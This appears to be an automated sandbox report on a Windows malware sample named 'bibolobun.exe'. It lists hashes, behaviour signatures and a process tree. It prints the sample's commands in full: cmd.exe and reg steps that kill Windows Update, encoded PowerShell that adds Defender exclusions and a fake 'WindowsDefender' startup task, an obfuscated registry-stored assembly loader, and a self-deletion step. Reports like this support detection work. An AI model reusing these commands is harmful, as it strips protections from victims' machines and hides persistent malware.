Analysis
max time kernel: 31s
max time network: 72s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-08-2022 08:07

Static task: static1
Behavioral task: behavioral1
Sample: bibolobun.exe
Resource: win7-20220812-en

General
Target: bibolobun.exe
Size: 5.1MB
MD5: 2438b851e157a3f70bd48af1984b2139
SHA1: 105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256: bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512: ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
SSDEEP: 98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe

Drops file in Drivers directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe

Possible privilege escalation attempt 2 IoCs
Processes:
pid | process
5112 | takeown.exe
2936 | icacls.exe

Stops running service(s) 3 TTPs

Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid | process
5112 | takeown.exe
2936 | icacls.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
1040 | sc.exe
1216 | sc.exe
4212 | sc.exe
1244 | sc.exe
1120 | sc.exe

Modifies registry key 1 TTPs 9 IoCs
Processes:
pid | process
748 | reg.exe
4640 | reg.exe
1012 | reg.exe
2260 | reg.exe
4880 | reg.exe
2356 | reg.exe
8 | reg.exe
1880 | reg.exe
4176 | reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid | process
3488 | powershell.exe
3488 | powershell.exe
2440 | powershell.exe
2440 | powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3488 | powershell.exe
Token: SeShutdownPrivilege | 988 | powercfg.exe
Token: SeCreatePagefilePrivilege | 988 | powercfg.exe
Token: SeShutdownPrivilege | 224 | powercfg.exe
Token: SeCreatePagefilePrivilege | 224 | powercfg.exe
Token: SeShutdownPrivilege | 1336 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1336 | powercfg.exe
Token: SeShutdownPrivilege | 4976 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4976 | powercfg.exe
Token: SeDebugPrivilege | 2440 | powershell.exe
Token: SeTakeOwnershipPrivilege | 5112 | takeown.exe

Suspicious use of WriteProcessMemory 41 IoCs
Processes:
description | pid | process | target process
PID 4964 wrote to memory of 4580 | 4964 | bibolobun.exe | conhost.exe
PID 4964 wrote to memory of 4580 | 4964 | bibolobun.exe | conhost.exe
PID 4964 wrote to memory of 4580 | 4964 | bibolobun.exe | conhost.exe
PID 4580 wrote to memory of 3488 | 4580 | conhost.exe | powershell.exe
PID 4580 wrote to memory of 3488 | 4580 | conhost.exe | powershell.exe
PID 4580 wrote to memory of 3900 | 4580 | conhost.exe | cmd.exe
PID 4580 wrote to memory of 3900 | 4580 | conhost.exe | cmd.exe
PID 4580 wrote to memory of 4124 | 4580 | conhost.exe | cmd.exe
PID 4580 wrote to memory of 4124 | 4580 | conhost.exe | cmd.exe
PID 3900 wrote to memory of 1040 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 1040 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 1216 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 1216 | 3900 | cmd.exe | sc.exe
PID 4124 wrote to memory of 988 | 4124 | cmd.exe | powercfg.exe
PID 4124 wrote to memory of 988 | 4124 | cmd.exe | powercfg.exe
PID 4124 wrote to memory of 224 | 4124 | cmd.exe | powercfg.exe
PID 4124 wrote to memory of 224 | 4124 | cmd.exe | powercfg.exe
PID 3900 wrote to memory of 4212 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 4212 | 3900 | cmd.exe | sc.exe
PID 4124 wrote to memory of 1336 | 4124 | cmd.exe | powercfg.exe
PID 4124 wrote to memory of 1336 | 4124 | cmd.exe | powercfg.exe
PID 4580 wrote to memory of 2440 | 4580 | conhost.exe | powershell.exe
PID 4580 wrote to memory of 2440 | 4580 | conhost.exe | powershell.exe
PID 4124 wrote to memory of 4976 | 4124 | cmd.exe | powercfg.exe
PID 4124 wrote to memory of 4976 | 4124 | cmd.exe | powercfg.exe
PID 3900 wrote to memory of 1244 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 1244 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 1120 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 1120 | 3900 | cmd.exe | sc.exe
PID 3900 wrote to memory of 748 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 748 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 4640 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 4640 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 8 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 8 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 1880 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 1880 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 4176 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 4176 | 3900 | cmd.exe | reg.exe
PID 3900 wrote to memory of 5112 | 3900 | cmd.exe | takeown.exe
PID 3900 wrote to memory of 5112 | 3900 | cmd.exe | takeown.exe

Processes
- C:\Users\Admin\AppData\Local\Temp\bibolobun.exe
  "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\sc.exe
        sc stop UsoSvc
        - Launches sc.exe
      - C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        - Launches sc.exe
      - C:\Windows\system32\sc.exe
        sc stop wuauserv
        - Launches sc.exe
      - C:\Windows\system32\sc.exe
        sc stop bits
        - Launches sc.exe
      - C:\Windows\system32\sc.exe
        sc stop dosvc
        - Launches sc.exe
      - C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies security service
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key
      - C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions
      - C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key
      - C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\conhost.exe
      C:\Windows\System32\conhost.exe
    - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
      - C:\Windows\system32\schtasks.exe
        schtasks /run /tn "WindowsDefender"
    - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
      - C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
- C:\Program Files\Platform\Defender\update.exe
  "C:\Program Files\Platform\Defender\update.exe"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6ab240f6-be2f-4a8e-ac90-75b88bd58102}
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Platform\Defender\update.exe
  Filesize: 5.1MB
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
- \Users\Admin\AppData\Roaming\D2B6.tmp